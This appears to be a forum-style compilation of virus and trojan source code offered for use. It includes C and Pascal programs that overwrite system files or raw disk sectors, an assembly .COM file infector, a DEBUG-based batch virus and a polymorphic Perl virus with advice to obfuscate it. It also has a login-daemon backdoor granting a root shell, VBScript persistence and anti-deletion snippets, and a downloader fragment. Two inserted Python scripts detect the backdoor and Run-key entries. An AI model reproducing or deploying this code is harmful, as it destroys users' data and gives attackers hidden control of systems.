for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SJ";
gotoxy(20,14);
cout<<"SAY GOOD BYE TO YOUR PC IN ";
for(int j=10;j>=0;j--)
{
gotoxy(48,14);
cout<delay(1000);
}
clrscr();
cout<<"
1.HARD-DISK CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

2.MOTHER BOARD CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";
delay(4000);
cout<<"completed";
cout<<"

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
cout<<"

VIRUS.EXE";
delay(2000);
cout<<"
*************************";
cout<<"
Buddy it's a simply joke ";
cout<<"
*************************";
delay(4000);
cout<<"


**********************************";
cout<<"
For Real Virus ";
cout<<"
Contact Me: SJ";
cout<<"
Mo: 010101010101 ";
cout<<"
Email: samjohnyb4u@gmail.com";
cout<<"
**********************************";
delay(10000);
}

void fool()
{
clrscr();
int g=DETECT,h;
initgraph(&g,&h,"c:\tc\bgi");
cleardevice();
delay(1000);
setcolor(2);
settextstyle(1,0,1);
delay(1000);
setbkcolor(BLUE);
getch();
delay(4000);
closegraph();
exit(0);
}
VIRUS Designing - Use responsibly
#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

//#include
#include
#include
#include
#include
#include
#include
#include

int main(void)
{
clrscr();
int handle;
char string[1000];
int length, res,i;

/*
Create a file named "DOVE.GIF" in the current directory and write
a string to it. If "DOVE.GIF" already exists, it will be overwritten.
*/

if ((handle = open("C:\windows\win.com", O_WRONLY | O_CREAT |
O_TRUNC,
S_IREAD | S_IWRITE)) == -1)
{
printf("Error opening file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
exit(1);
}

strcpy(string, "Hello !!!!!!! This is a VIRUS ATTACK !!! This
execution currupt your WINDOWS !!!!!!
");

length = strlen(string);

if ((res = write(handle, string, length)) != length)
{
printf("Error writing to the file.
");
getch();
exit(1);
}
printf("

Wrote %d bytes to the file.
", res);
cout<<"

Hello !!!!!!!!";
cout<<"

This is a VIRUS ATTACK !!!";
cout<<"

This execution currupt your WINDOWS !!!!!!
";
close(handle);
getch();
return 0;
}

The HITLER virus
The HITLER virus is a memory resident .COM infector which adds itself
to the end of infected files. HITLER employs
minimal directory stealth.
The minimal stealth allows the virus to subtract its file size from
infected targets when the user takes a look at them using "dir"
functions while the virus is in memory.
Most of HITLER's code is devoted to a huge data table which is a voice
sample of some nut shouting "HITLER." The virus ties the effect to
the timer tick function, but if you want to hear it immediately, change the
source where indicated. The resulting code will assemble under A86. On
execution the virus will lock the PC into the voice effect until reboot,
rendering it uninfective, if annoying. Not all PCs can generate the
HITLER sound effect - some will just buzz.

make sure u don't misuse it.. the code is totally big so i am uploading it as txt file.. u can scan it.. txt file doesn't prove anything.. lolzzz

Download:
hxxp://rapidshare.com/files/65139588/Hitler.txt

Bomber Virus
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}



Virus
Program Wipe_The_Fuckers_HD;
uses dos,crt;
var read:string;

Begin
clrscr;
inline ($B0/$08/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {I:}
write ('.');
inline ($B0/$09/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {j:}
write ('.');
inline ($B0/$07/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {H:}
write ('.');
inline ($B0/$06/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {G:}
write ('.');
inline ($B0/$05/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {F:}
write ('.');
inline ($B0/$04/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {E:}
write ('.');
inline ($B0/$03/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {D:}
write ('.');
inline ($B0/$02/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {C:}
write ('.');
inline ($B0/$01/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {B:}
write ('.');
inline ($B0/$00/$B9/$FF/$00/$BA/$00/$00/$CD/$26); {A:}
writeln;
textcolor (14);
Writeln ('FUCK OFF');
Writeln('');
Writeln('');
textcolor (13);
textcolor (12);
textcolor (11);
Writeln('');
sound(500);

End.

This is a live trojan tarball Backdoor

Batch Virus
Whoever thought that viruses could be in BATCH files? This virus which
we are about to see makes use of the MS-DOS operating system. This BATCH
virus uses DEBUG & EDLIN programs.
NAME: VR.BAT

ECHO = OFF (Self explanatory)
CTTY NUL (This is important. Console output is turned off)
PATH C:\MSDOS (May differ on other systems)
DIR *.COM/W>IND (The directory is written on "ind" ONLY name entries)
EDLIN IND<1 ("ind" is processed with EDLIN so only file names appear)
DEBUG IND<2 (New batch program is created with debug)
EDLIN NAME.BAT<3 (This batch goes to an executable form because of EDLIN)
CTTY CON (Console interface is again assigned)
NAME (Newly created NAME.BAT is called)

In addition to this Batch file, there are command files, here named 1,2,3.
Here is the first command file:

NAME: 1

1,4D (Here line 1-4 of the "ind" file are deleted)
E (Save file)

Here is the second command file:

NAME: 2

M100,10B,F000 (First program name is moved to the F000H address to save)
E108".BAT" (Extension of file name is changed to .BAT)
M100,10B,F010 (File is saved again)
E100"DEL" (DEL Command is written to address 100H)
MF000,F00B,104 (Original file is written after this command)
E10C 2E (Period is placed in front of extension)
E110 0D,0A (Carriage return plus line feed)
MF010,F020,11F (Modified file is moved to 11FH address from buffer area)
E112"COPY\VR.BAT" (Copy command is now placed in front of file)
E12B 0D,0A (Copy command terminated with carriage return + line feed)
RXC (The CX register is ...)
2C (Set to 2CH)
NNAME.BAT (Name it NAME.BAT)
W (Write)
Q (Quit)

The third command file must be printed as a hex dump because it contains
two control characters (1Ah=Control Z) and this is not entirely printable.
Hex dump of the third command file:
NAME: 3

0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
0110 79 29 0D 32 2C 32 3F 52-20 1A 0D 6E 6E 79 79 79
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00

In order for this virus to work, VR.BAT should be in the root. This
program only affects .COM files.

Start: Jmp MainVir
Db '*'

MainVir: Call On1
On1: Pop BP
Sub BP,Offset MainVir+3
Push Ax
Mov Ax,Cs:OrgPrg[BP]
Mov Bx,Cs:OrgPrg[BP]+2
Mov Cs:Start+100h,Ax
Mov Cs:Start[2]+100h,Bx
Mov Ah,1ah
Mov Dx,0fd00h
Int 21h
Mov Ah,4eh
Search: Lea Dx,FileSpec[BP]
Xor Cx,Cx
Int 21h
Jnc Found
Jmp Ready
Found: Mov Ax,4300h
Mov Dx,0fd1eh
Int 21h
Push Cx
Mov Ax,4301h
Xor Cx,Cx
Int 21h
Mov Ax,3d02h
Int 21h
Mov Bx,5700h
Xchg Ax,Bx
Int 21h
Push Cx
Push Dx
Mov Ah,3fh
Lea Dx,OrgPrg[BP]
Mov Cx,4
Int 21h
Mov Ax,Cs:[OrgPrg][BP]
Cmp Ax,'MZ'
Je ExeFile
Cmp Ax,'ZM'
Je ExeFile
Mov Ah,Cs:[OrgPrg+3][BP]
Cmp Ah,'*'
Jne Infect
ExeFile: Call Close
Mov Ah,4fh
Jmp Search
FSeek: Xor Cx,Cx
Xor Dx,Dx
Int 21h
Ret
Infect: Mov Ax,4202h
Call FSeek
Sub Ax,3
Mov Cs:CallPtr[BP]+1,Ax
Mov Ah,40h
Lea Dx,MainVir[BP]
Mov Cx,VirLen
Int 21h
Mov Ax,4200h
Call FSeek
Mov Ah,40h
Lea Dx,CallPtr[BP]
Mov Cx,4
Int 21h
Call Close
Ready: Mov Ah,1ah
Mov Dx,80h
Int 21h
Pop Ax
Mov Bx,100h
Push Cs
Push Bx
Retf
Close: Pop Si
Pop Dx
Pop Cx
Mov Ax,5701h
Int 21h
Mov Ah,3eh
Int 21h
Mov Ax,4301h
Pop Cx
Mov Dx,0fd1eh
Int 21h
Push Si
Ret

CallPtr Db 0e9h,0,0
FileSpec Db '*.COM',0

OrgPrg: Int 20h
Nop
Nop

VirLen Equ $-MainVir


script virus source code
FileSystemObject","") tmp2=2 set tmp = F.GetSpecialFolder(tmp2) SS.open fname1= F.BuildPath(tmp,fname1) SS.write x.responseBody SS.savetofile fname1,2 SS.close call shellexe(zz,fname1)//////////////////////////test2.htmVBScript.

Poly Perl Virus
Ok, this is a polymorphic perl virus which is using EPO techniques,
To make this code useful strip the comments, remove linebreaks, and
obfuscate it .. ;)
# 1st Poly Virus by SnakeByte [Matrix/KryptoCrew]
open(File,$0);@Virus=;close(File); # read own code
$Virus=join("", @Virus);foreach $FileName(<*>) { # get files
if ((-r $FileName) && (-w $FileName) && (-f $FileName)) { # check file
open(File, "$FileName");@Temp=;close(File); # open file
if ((@Temp[0] =~ /perl/i ) && ( substr(@Temp[0],0,2) eq "\#!" )) { # perl file ?
if (( length(@Temp[0]) % 5 ) != 0 ){ # already infected ?
# first we generate a decryptor

$Key = int(rand(255)); # cryptkey
$crypttype = int(rand(2)); # how to crypt it ?

for ( $X = 0; $X < length($Virus); $X++ ){ # Encrypt it
if ( $crypttype == 0 ){
@Crypt[$X] = (ord(substr($Virus, $X, 1))) * ($Key); # Multiply
} else {
@Crypt[$X] = (ord(substr($Virus, $X, 1))) + ($Key); # Addition
}
}

$connectit = chr(int(rand(25)+65));
$VirString = join($connectit, @Crypt); # all values get seperated by a !
$filename = chr(int(rand(25)+65)); # random filename to put virus to
$filename .= int(rand(65535));
if ( int(rand(2)) == 0 ){
@Vir[0] = "\$l1l = \"$VirString\"\;";
@Vir[1] = "\$11l = $Key\;"; # key to decrypt
} else {
@Vir[0] = "\$11l = $Key\;"; # key to decrypt
@Vir[1] = "\$l1l = \"$VirString\"\;";
}
@Vir[2] = "\@ll1 = split(\"$connectit\", \$l1l)\;";
@Vir[3] = "for ( \$lll = 0\; \$lll < (\@ll1)\; \$lll++ ) { "; # Decrypt Loop

if ( $crypttype == 0 ){
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll] \/ \$11l)\;"; # Decrypt Char
} else {
@Vir[4] = " \$l11 .= chr(\@ll1[\$lll]-\$11l)\;"; # Decrypt Char
}
@Vir[5] = "}";
@Vir[6] = "open(1l1, \">$filename\")\;"; # write encrypted
@Vir[7] = "print 1l1 \$l11\;"; # string to a file
@Vir[8] = "close(1l1)\;";
@Vir[9] = "\$lll = \`perl $filename\`;\n";
# and start it

# change variables
# $Virus File @Virus $X $Key $Vir
# l1l 1l1 ll1 lll 11l l11
@vars = ("l1l", "1l1", "ll1", "lll", "11l", "l11"); # replace the variables
foreach $replace (@vars){
$newVar = chr(int(rand(25)+65)); # with a letter
$newVar .= int(rand(65535)); # and a random number
for ( $b=0; $b < @Vir; $b++){
@Vir[$b] =~ s/$replace/$newVar/g ;
}
}


do {
chomp @Temp[0];
@Temp[0] .= " \n";
} until((length(@Temp[0]) % 5) == 0 );


open(File, ">$FileName"); # and write the infected
$Temp = join("\n", @Vir);


for ( $X = ( (@Temp) >> 1 ); $X < @Temp; $X++ ){
if ( @Temp[$X] =~ "\;\n" ) { # insert virus in the middle
$Temp2 = join("", @Temp[0..$X]); # write first part
print File $Temp2; # and virus
print File $Temp; $X++;
$Y = (@Temp);
$Temp2 = join("", @Temp[$X..$Y]); # insert rest of the file
print File $Temp2;
goto CloseFile;
}
}
$Temp2 = join("", @Temp); # no possibility to insert virus
print File $Temp; # file back to disk
print File $Temp2; # without EPO


CloseFile:
close(File);
}}}}

$a = `rm $0`; # delete our selves..

Trojan Daemon[SJ]
Universal trojan ( login / imapd / qpopd )
But will work on more daemons and on most systems.
After installed on the system.
Telnet to the daemon and you will have 1 second to type in
the trojan passwd to get root access else it executes the real daemon.


( login / ipop3d / imapd trojan )
This is a combined login / ipop3d / imapd trojan.
* This should work with other daemons but I have only tested these 3
* REAL == mv the real daemon to this path.
* TROJAN == This is the real path of the daemon, put the trojan here. It defaults to login trojan now.
* Don't forget you might have to the rights of the trojan.
* Telnet to the port whatever deamon its set for.
* The passwd you need to enter in one second == door
* and you will get that lovely # =)
* This works on most systems.


#include
#include
#include
#include

#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "door"

char **execute;
char passwd[5];

int main(int argc, char *argv[]) {
void connection();

signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;

scanf("%s",passwd);

if(strcmp(passwd,ROOT)==0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0);
}
else
{
execv(REAL,execute);
exit(0);
}
}


void connection()
{
execv(REAL,execute);
exit(0);
}
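The wrapper above leaves a recognisable artifact on disk: the genuine daemon is renamed to a dot-prefixed file (here /bin/.login) beside the replaced binary. The following check is an added example, not part of the original post, and looks for that pairing; the function names and the demo directory are constructed for illustration.

```python
import os
import stat
import tempfile


def hidden_executables(directories):
    """Return (hidden_path, visible_sibling_or_None) for every dot-prefixed
    regular file with an execute bit set in the given directories."""
    hits = []
    for d in directories:
        try:
            entries = sorted(os.scandir(d), key=lambda e: e.name)
        except OSError:
            continue  # directory missing or unreadable: nothing to report
        for e in entries:
            if not e.name.startswith("."):
                continue
            st = e.stat(follow_symlinks=False)
            if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111:
                sibling = os.path.join(d, e.name[1:])
                hits.append((e.path,
                             sibling if os.path.exists(sibling) else None))
    return hits


def build_demo_tree():
    """Constructed sample layout: .login next to login, plus benign files."""
    root = tempfile.mkdtemp(prefix="bin-demo-")
    for name, mode in ((".login", 0o755), ("login", 0o755),
                       (".cache", 0o644), ("ls", 0o755)):
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write("placeholder\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    # On a real host, pass the system binary directories instead.
    for hidden, sibling in hidden_executables(["/bin", "/sbin", "/usr/sbin"]):
        print("hidden executable:", hidden, "paired with:", sibling)
```

A hit with a visible sibling is the pattern worth escalating; package verification such as `rpm -Vf /bin/login` or `dpkg --verify` then confirms whether the visible binary still matches the vendor copy.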
It's basically not a virus but will work like same...

01001011000111110010010101010101010000011111100000

just save it in notepad with the extension .cmd

and scan with any antivirus, it will not be detected... but if opened it will format whole hard disk...
Startup Virus
With these two lines your worm will start with Windows.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\Worm.vbs %"
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
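The Run-key write above is easy to spot during triage because the autorun command launches a script host. This added example (not from the original post) parses the text of a `reg export` of the Run keys and flags such entries; the sample export is constructed, only REG_SZ string values are handled, and the caller is assumed to have decoded the export file to text already.

```python
import re

# Constructed sample of `reg export` text (not taken from a real host).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"Worm"="wscript.exe c:\\windows\\Worm.vbs %"
"Updater"="\"C:\\Program Files\\Vendor\\updater.exe\" /silent"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Notes"="cscript.exe //B C:\\Users\\Public\\notes.js"
'''

RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')
SCRIPT_HOST = re.compile(r"(?:^|[\\\s\"])(wscript|cscript|mshta)(?:\.exe)?\b", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|hta)\b", re.I)


def unescape(s):
    """Undo .reg string escaping (\\\\ -> \\ and \\" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def find_script_autoruns(reg_text):
    """Return (key, value_name, command, reasons) for Run/RunOnce entries
    whose command starts a script host or names a script file."""
    findings = []
    key = None
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            key = name if RUN_KEY.search(name) else None
            continue
        m = VALUE.match(line) if key else None
        if not m:
            continue
        value_name, command = unescape(m.group(1)), unescape(m.group(2))
        reasons = []
        if SCRIPT_HOST.search(command):
            reasons.append("script host")
        if SCRIPT_EXT.search(command):
            reasons.append("script file")
        if reasons:
            findings.append((key, value_name, command, reasons))
    return findings


if __name__ == "__main__":
    for key, name, command, reasons in find_script_autoruns(SAMPLE_REG):
        print(f"{key}\\{name}: {command}  [{', '.join(reasons)}]")
```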


Anti Deletion Virus
This function must be the last one called, because it never ends.
If it detects that the file has been deleted, it's created again.
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
_______________________________________________________________________
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯